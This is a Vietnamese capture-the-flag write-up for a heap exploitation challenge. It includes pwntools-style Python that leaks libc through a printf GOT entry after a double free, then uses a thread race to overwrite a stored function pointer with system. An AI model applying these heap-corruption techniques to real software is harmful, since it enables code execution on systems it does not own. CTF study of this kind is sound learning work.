# PWN3
>

## Hiểu chương trình

### Hàm Main

![OPTION PROGRAME](Option%20(2).PNG)
* Chương trình có 3 option: 1 Add, 2 View, 3 Delete.

### Hàm Add

![add](add.PNG)
* Sẽ có nhập độ dài và nhập chuỗi với độ dài được nhâp ở trên
* Có 2 hàm malloc được gọi để cấp phát vùng nhớ chứa chuỗi và điạ chỉ hàm abcprint()
* Từ đó ta xây dựng được stuct như sau: 

`struct save{
    name dd;
    abcprint dd;
}`

* Chú ý 1: Có một câu hỏi ở đây. Tại sao tác giả lại lưu địa chỉ của hàm vào struct save ta đoán chắc tác giả muốn các bạn tìm cách ghi đè vùng nhớ   đó băng địa chỉ hàm system(Lại phải leak địa chỉ libc). Hah

### Hàm Delete

![Delete](delete.PNG)
* Tại hàm delete sẽ free 2 vùng nhớ mà đã cấp phát ở  hàm  add
* Sau đó chương trình sẽ thực hiện gộp danh sách đia chỉ được lưu tại biến  gs và gắn null

### Hàm View

![View](View.PNG) 
* Tại đậy chương trình sẽ cho chúng ta nhập  2 lần: 1 một delay view, (Chú ý 2: What? - Chỉ là view thôi mà delay làm chi), 2 nhập index hiển thị
* Chương trình cũng gọi hàm doView được sử dụng bởi thread  (chú ý 3: In thôi  mà phức tạp vl)

### Hàm doView

![doview.PNG](doview.PNG)
* Hàm doview sẽ sử dụng địa chỉ của hàm abcprint() được lưu trong struct save để in biến name.

## Exploit
### Từ chú ý 1: 

* Tôi có thể ghi đè biến name, và biến abcprint như cấu trúc ở trên bằng cách dự vào cách cấp phát malloc và free trong glib, fastbin  là LIFO
* Ý định của tôi là sẽ leak address libc
- Bộ nhớ heap lúc trước ghi đè
![leak libc](old_heap.png)
- Bộ nhớ heap sau khi ghi đè (địa chỉ là bảng got hàm printf)
![leak libc 1](new_heap.png)

```
add(0x60, "A")
add(0x60, "B")
add(0x60, "C")
add(0x60, "D")
add(0x60, "E")
add(0x60, "F")
add(0x60, "G")

free("1")
free("1") # Chưa gộp danh sách "ga" index sẽ là 2

add(11, p32(binray.got['printf']) + p32(0x080487bb))
r.recvuntil("messager:\n")
leak =  r.recv(4)
printf_addr = u32(leak)
libc.address = printf_addr - libc.symbols['printf']

print "printf: ", hex(printf_addr)
print "libc: ", hex(libc.address)
print "system: ", hex(libc.symbols['system'])
```

* Nhưng thật tiếc khi hàm delete được thực thì danh sách "gs" sẽ gộp và gán null vậy là ý tưởng đã vụt tăt.

### Chú ý 2, 3:

* Ý tưởng mới đến từ thread và delay.
* Mọi thứ sinh ra điều có nguyên do của nó và nguyên đo mà nó tồn tại có lẽ là: race condition 
* Ak không phải là chắc chắn
* Và delay để chờ delete và add xong rồi mới thực hiện in giá trị. Mà giá trị cũ vẫn tồn tại trong biến của thread mới sinh ra.
* Vậy là xong -- mọi câu hỏi đã dk giải quyết.

```
add(0x60, "F")
add(0x60, "G")

show("1", "2")

free("1")
free("1")

add(11, p32(binray.got['printf']) + p32(0x080487bb))
r.recvuntil("messager:\n")
leak =  r.recv(4)
printf_addr = u32(leak)
libc.address = printf_addr - libc.symbols['printf']

print "printf: ", hex(printf_addr)
print "libc: ", hex(libc.address)
print "system: ", hex(libc.symbols['system'])
```

3. Bước cuối cùng là chúng ta chỉ cần ghi đè biến  abcprint =  system và chuỗi  'sh'  vào  biến name.

--> Cuối cùng cũng done.
Flag: NightSt0rm{:'(_500k_vnd}
Tiếc là không kiếm dk 500k_vnd .

[exploit](exploit.py)